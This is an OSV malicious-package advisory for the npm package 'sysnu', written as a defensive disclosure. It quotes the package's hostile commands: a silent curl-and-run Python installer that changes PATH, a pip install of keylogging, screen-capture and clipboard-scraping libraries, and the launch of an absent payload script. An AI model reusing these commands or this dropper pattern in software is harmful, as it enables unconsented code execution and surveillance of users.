MAL-2026-5617
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/sysnu/MAL-2026-5617.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-5617
- Published
- 2026-06-11T06:49:33Z
- Modified
- 2026-06-11T08:01:32.824773548Z
- Summary
- Malicious code in sysnu (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (eac9873e59ffdf79c56fd4f9366b56e0532f87dc00c4380fae18d714785b0bc8)
On require() / CLI invocation, sysnu performs two install-time-equivalent actions on Windows hosts. First, if
pythonis not on PATH, index.js (lines 42-46) runscurl -s -L -o <tmp>\python-3.12.3-amd64.exe https://www.python.org/ftp/python/3.12.3/python-3.12.3-amd64.exeand then executes the installer with/quiet InstallAllUsers=0 PrependPath=1, deleting the installer afterwards. Code comments explicitly describe this as a 'GHOST INSTALLER' with 'No UI, No Admin Popup' — i.e., the runtime is provisioned and PATH is mutated with no user consent. Second, index.js line 73 unconditionally runspip install pyperclip keyboard requests pillow mss pyautogui pywin32 uiautomation comtypes --quiet— a Windows surveillance stack covering keylogging (keyboard), screen capture (mss/pillow), input automation (pyautogui), clipboard scraping (pyperclip), and UI automation (uiautomation/comtypes/pywin32). Index.js line 81 then spawnspython pointer.py, butpointer.pyis NOT present in the tarball, so the package is a stager awaiting an out-of-band payload that will execute with the freshly-installed surveillance primitives available. The package's advertised purpose ('System binary configuration tool') has no relationship to clipboard/keyboard/screen capture. Metadata is placeholder-grade (author 'ABC', no repository/homepage, generic description), consistent with a throwaway dropper account. - Database specific
{ "malicious-packages-origins": [ { "id": "IN-MAL-2026-005656", "versions": [ "1.0.1" ], "sha256": "6ce3c0fee91f5a835d43c1c136e3535f4ce0bff6c519d59166e95cf7f7cefa3a", "source": "amazon-inspector", "modified_time": "2026-06-11T06:49:36Z", "import_time": "2026-06-11T07:49:37.670970859Z" }, { "id": "IN-MAL-2026-005652", "versions": [ "1.0.0" ], "sha256": "eac9873e59ffdf79c56fd4f9366b56e0532f87dc00c4380fae18d714785b0bc8", "source": "amazon-inspector", "modified_time": "2026-06-11T06:49:33Z", "import_time": "2026-06-11T07:49:37.266355882Z" } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
Affected packages
npm / sysnu
Package
- Name
- sysnu
- View open source insights on deps.dev
- Purl
- pkg:npm/sysnu
Database specific
cwes
[
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/sysnu/MAL-2026-5617.json"
indicators
{
"evidence_files": [
{
"path": "index.js",
"sha256": "dd63a58755fb0ff2919a9debd8e6adb710a9f755454c10e766920dec788c4c33",
"tlsh": "69814f065a95a234ed7247a99b07212be517a063a100e69cbdbe83840f76945c073fee"
},
{
"path": "pointer.py",
"sha256": "8674a966c2b0c3ec348331dd0273de15cbe236eb8b10a1afbcd63e1dd7f11ea7",
"tlsh": "b2e2ea09ec0d0896c473de2e9952b817fb1a0b435a1e9e17f8bc99905f7430789e4ef9"
},
{
"path": "package.json",
"sha256": "3a4d9dd11c7d4b5c9c7982bb68457c0dff5353faf7972e109be6aa464617a017",
"tlsh": "44e04f3789615d9344b44aa29a769a19b1b28b3f10294c0f31bb905c97b25a245bab2c"
}
],
"package_integrity": [
{
"filename": "sysnu-1.0.1.tgz",
"hashes": {
"sha512_sri": "sha512-bw0yvTTcwyKVAQwYfceEbDsTNPcA15TRiKQ0s1s7WLqw6KnoukrNvT6+DxsFftRIQUT8D8dFo23mIrVqMWnNiA==",
"sha1": "72d44e77e44dc27999e3ac3326628cb91a8ef837"
}
}
]
}